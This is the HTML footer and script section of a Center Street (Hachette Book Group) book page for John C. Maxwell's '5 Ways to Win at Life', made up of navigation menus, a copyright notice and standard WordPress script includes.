	<path role="presentation" class="cls-1" d="M19.37,23.13a3.76,3.76,0,0,0,3.76-3.76,3.9,3.9,0,0,0,0-.4l0-.11c0-.09,0-.19,0-.28l0-.12c0-.09,0-.17-.07-.26l0-.12-.1-.24,0,0h0a3.75,3.75,0,0,0-6.81,0h0l0,0-.1.24,0,.12c0,.08-.05.17-.07.26l0,.12c0,.09,0,.18,0,.28s0,.07,0,.11a3.83,3.83,0,0,0,0,.4A3.76,3.76,0,0,0,19.37,23.13Z" transform="translate(0 0)"/>
	<path role="presentation" class="cls-1" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0Zm9.69,26.64a2.42,2.42,0,0,1-2.42,2.42H12.1a2.42,2.42,0,0,1-2.42-2.42V12.1A2.42,2.42,0,0,1,12.1,9.68H26.64a2.42,2.42,0,0,1,2.42,2.42Z" transform="translate(0 0)"/>
</svg>
					</a>
				</li>
																				</ul>
		<nav class="site-footer__menus">
		
<ul class="site-footer__menu">
	<li class="site-footer__menu-item-has-children" >
		<span class="site-footer__menu-text toggleable" data-toggle-target="site-footer__sub-menu-about" data-toggle-block="site-footer__sub-menu" data-toggle-element="site-footer__sub-menu-about">
			About			<span class="site-footer__menu-expand sub-menu-expand">
				<span class="site-footer__plus">+</span>
				<span class="site-footer__minus">-</span>
			</span>
		</span>
		<div class="sub-menu" data-toggle-element="site-footer__sub-menu-about">
			<ul id="menu-about" class="menu"><li id="menu-item-647353" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-647353"><a href="/landing-page/about-hachette-book-group-2/">About Us</a></li>
<li id="menu-item-478324" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478324"><a href="https://www.grandcentralpublishing.com/leadership/">Our Leadership</a></li>
<li id="menu-item-478335" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478335"><a href="https://www.hachettebookgroup.com/imprints/">Imprints</a></li>
<li id="menu-item-550778" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-550778"><a href="https://www.hachettebookgroup.com/newsletters/">Newsletter Subscription</a></li>
<li id="menu-item-1192194" class="menu-item menu-item-type-post_type menu-item-object-landing-page menu-item-1192194"><a href="https://www.hachettebookgroup.com/landing-page/freedom-of-expression/">Freedom of Expression</a></li>
<li id="menu-item-1204864" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1204864"><a href="/landing-page/social-impact-at-hbg/">Social Impact at HBG</a></li>
<li id="menu-item-478329" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478329"><a href="https://www.hachettebookgroup.com/about/hbg-in-the-news/">HBG In the News</a></li>
<li id="menu-item-478328" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478328"><a href="https://www.hachettebookgroup.com/press-publicity/">Press &amp; Publicity</a></li>
</ul>		</div>
	</li>
</ul>

<ul class="site-footer__menu">
	<li class="site-footer__menu-item-has-children" >
		<span class="site-footer__menu-text toggleable" data-toggle-target="site-footer__sub-menu-resources" data-toggle-block="site-footer__sub-menu" data-toggle-element="site-footer__sub-menu-resources">
			Resources			<span class="site-footer__menu-expand sub-menu-expand">
				<span class="site-footer__plus">+</span>
				<span class="site-footer__minus">-</span>
			</span>
		</span>
		<div class="sub-menu" data-toggle-element="site-footer__sub-menu-resources">
			<ul id="menu-resources" class="menu"><li id="menu-item-230735" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230735"><a target="_blank" rel="noopener" href="https://authorportal.hbgusa.com">Authors &#038; Agents</a></li>
<li id="menu-item-230733" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230733"><a target="_blank" rel="noopener" href="https://www.hachettebookgroup.com/landing-page/hbg-booksellers/">Booksellers</a></li>
<li id="menu-item-230734" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230734"><a target="_blank" rel="noopener" href="https://www.hachettebookgroup.com/landing-page/client-services/">Client Services</a></li>
<li id="menu-item-230736" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230736"><a target="_blank" rel="noopener" href="https://www.hbgresources.com/">Librarians &#038; Educators</a></li>
<li id="menu-item-665775" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-665775"><a href="https://www.hachettebookgroup.com/landing-page/ordersupport">eCommerce Order Support</a></li>
<li id="menu-item-913357" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-913357"><a href="https://www.hachetteacademic.com/">Hachette Academic</a></li>
<li id="menu-item-512066" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-512066"><a href="https://www.centerstreet.com/about/careers/">Careers</a></li>
<li id="menu-item-478333" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-478333"><a href="https://www.hachettebookgroup.com/landing-page/contact-us-2">Contact HBG</a></li>
<li id="menu-item-478352" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478352"><a href="https://www.hachettebookgroup.com/about/faqs/">FAQ</a></li>
</ul>		</div>
	</li>
</ul>

<ul class="site-footer__menu">
	<li class="site-footer__menu-item-has-children" >
		<span class="site-footer__menu-text toggleable" data-toggle-target="site-footer__sub-menu-terms-and-policies" data-toggle-block="site-footer__sub-menu" data-toggle-element="site-footer__sub-menu-terms-and-policies">
			Terms and Policies			<span class="site-footer__menu-expand sub-menu-expand">
				<span class="site-footer__plus">+</span>
				<span class="site-footer__minus">-</span>
			</span>
		</span>
		<div class="sub-menu" data-toggle-element="site-footer__sub-menu-terms-and-policies">
			<ul id="menu-terms-and-policies" class="menu"><li id="menu-item-230741" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-230741"><a href="https://www.hachettebookgroup.com/terms-and-policies/terms-of-use/">Terms of Use</a></li>
<li id="menu-item-230740" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy menu-item-230740"><a href="https://www.hachettebookgroup.com/terms-and-policies/privacy-policy/">Privacy Policy</a></li>
<li id="menu-item-927110" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-927110"><a target="_blank" rel="noopener" href="https://hbgusa.zendesk.com/hc/en-us/articles/360047685472-HBG-CCPA-Privacy-Rights-Tool">Do Not Sell My Personal Information</a></li>
<li id="menu-item-362560" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-362560"><a href="https://www.hachettebookgroup.com/terms-and-policies/report-piracy/">Report Piracy</a></li>
<li id="menu-item-230738" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-230738"><a href="https://www.centerstreet.com/terms-and-policies/cpsia/">CPSIA</a></li>
</ul>		</div>
	</li>
</ul>
	</nav>
	<div class="site-footer__copyright">
		© 2022 Hachette Book Group		<br>
		Portions of data on HachetteBookGroup.com are supplied by Books In Print &reg;. Copyright 2022 ProQuest LLC. All rights reserved. All rights in images of books or other publications are reserved by the original copyright owners.	</div>
</footer>
			</div><!-- #content -->
		</div><!-- #page -->
		<style id='core-block-supports-inline-css' type='text/css'>
.wp-block-buttons.wp-container-2{justify-content:center;}
</style>
<script type='text/javascript' src='https://www.centerstreet.com/wp-content/mu-plugins/jetpack-11.6/_inc/build/photon/photon.min.js?ver=20191001' id='jetpack-photon-js'></script>
<script type='text/javascript' src='https://www.centerstreet.com/wp-content/plugins/hachette-plugin/build/campaignViewFrontEnd.bundle.min.js?ver=50d1f8c614fdf1b34766' id='hachette-plugin-campaign-view-frontend-js'></script>
<script type='text/javascript' src='https://www.centerstreet.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2' id='jquery-ui-core-js'></script>
<script type='text/javascript' src='https://www.centerstreet.com/wp-includes/js/jquery/ui/menu.min.js?ver=1.13.2' id='jquery-ui-menu-js'></script>
<script type='text/javascript' src='https://www.centerstreet.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9' id='regenerator-runtime-js'></script>
<script type='text/javascript' src='https://www.centerstreet.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0' id='wp-polyfill-js'></script>
<script type='text/javascript' src='https://www.centerstreet.com/wp-includes/js/dist/dom-ready.min.js?ver=392bdd43726760d1f3ca' id='wp-dom-ready-js'></script>
<script type='text/javascript' src='https://www.centerstreet.com/wp-includes/js/dist/hooks.min.js?ver=4169d3cf8e8d95a3d6d5' id='wp-hooks-js'></script>
<script type='text/javascript' src='https://www.centerstreet.com/wp-includes/js/dist/i18n.min.js?ver=9e794f35a71bb98672ae' id='wp-i18n-js'></script>
<script type='text/javascript' id='wp-i18n-js-after'>
wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ 'ltr' ] } );
</script>
<script type='text/javascript' src='https://www.centerstreet.com/wp-includes/js/dist/a11y.min.js?ver=ecce20f002eda4c19664' id='wp-a11y-js'></script>
<script type='text/javascript' id='jquery-ui-autocomplete-js-extra'>
/* <![CDATA[ */
var uiAutocompleteL10n = {"noResults":"No results found.","oneResult":"1 result found. Use up and down arrow keys to navigate.","manyResults":"%d results found. Use up and down arrow keys to navigate.","itemSelected":"Item selected."};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.centerstreet.com/wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.13.2' id='jquery-ui-autocomplete-js'></script>
<script type='text/javascript' src='https://www.centerstreet.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2' id='hoverIntent-js'></script>
<script type='text/javascript' id='hachette-site-js-js-extra'>
/* <![CDATA[ */
var newsletter = {"ajax_url":"https:\/\/www.centerstreet.com\/wp-admin\/admin-ajax.php","nonce":"393e35af4d","duplicate":"Success! You're signed up.","success":"Success! You're signed up.","invalid":"Hm, try another email?","error":"We're sorry, there was an error."};
var mailchimpPopup = {"ajax_url":"https:\/\/www.centerstreet.com\/wp-admin\/admin-ajax.php","nonce":"706068a79c","success":"Your preferences have been successfully saved.","error":"We're sorry, there was an error."};
var whatsInside = {"ajaxUrl":"\/wp-admin\/admin-ajax.php?action=zola_preview&zola-auth=1f9d32bba4"};
var lazyTitles = {"ajaxUrl":"\/wp-admin\/admin-ajax.php?action=lazy_title&load-title-auth=d10e15cd60"};
var icons = {"contributor":"https:\/\/www.centerstreet.com\/wp-content\/themes\/hachette\/static\/images\/icons\/contributor.png","hbg-title":"https:\/\/www.centerstreet.com\/wp-content\/themes\/hachette\/static\/images\/icons\/hbg-title.png"};
var geoCountryCode = "US";
var euroUser = "false";
var gdprForAll = "false";
var analytics = {"environAuth":"EVafa-1EU0ArWEPW1vxdeQ","environPreview":"env-24","dataLayer":"dataLayer","containerKey":"GTM-5LRFFXK"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.centerstreet.com/wp-content/themes/hachette/static/js/hachette-site.bundle.min.js?ver=fee10e6bdfd4a29dad04' id='hachette-site-js-js'></script>
<script type='text/javascript' id='hbg-all-domains-js-js-extra'>
/* <![CDATA[ */
var checkExam = {"ajaxUrl":"https:\/\/www.centerstreet.com\/wp-admin\/admin-ajax.php","nonce":"f6eddd707a","isbns":["5 Ways to Win at Life from John C. Maxwell"],"button":".zb-btn","link":"exam-copy-link","zola_url":"https:\/\/examcopyrequestform.poweredbyzola.com\/?isbn="};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.centerstreet.com/wp-content/themes/hachette-book-group/client/build/js/lens-hbg-all-domains.bundle.js?ver=b71796abef6a8c169c32' id='hbg-all-domains-js-js'></script>
<script type='text/javascript' id='vue_cart-js-extra'>
/* <![CDATA[ */
var source = {"env":"production","cartMessage":""};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.centerstreet.com/wp-content/themes/hachette-book-group/client/build/images/static/js/cart.js?ver=0.1' id='vue_cart-js'></script>
<script type='text/javascript' src='https://platform.twitter.com/widgets.js?ver=1.0' id='hbg-twitter-widget-js'></script>
<script type='text/javascript' src='https://www.centerstreet.com/wp-content/themes/hachette-book-group/client/build/js/lens-center-street.bundle.js?ver=b71796abef6a8c169c32' id='hachette-lens-js-js'></script>
	<script src='https://stats.wp.com/e-202249.js' defer></script>
	<script>
		_stq = window._stq || [];
		_stq.push([ 'view', {v:'ext',blog:'155679224',post:'1289048',tz:'-5',srv:'www.centerstreet.com',hp:'vip',j:'1:11.6'} ]);
		_stq.push([ 'clickTrackerInit', '155679224', '1289048' ]);
	</script>	</body>
</html>

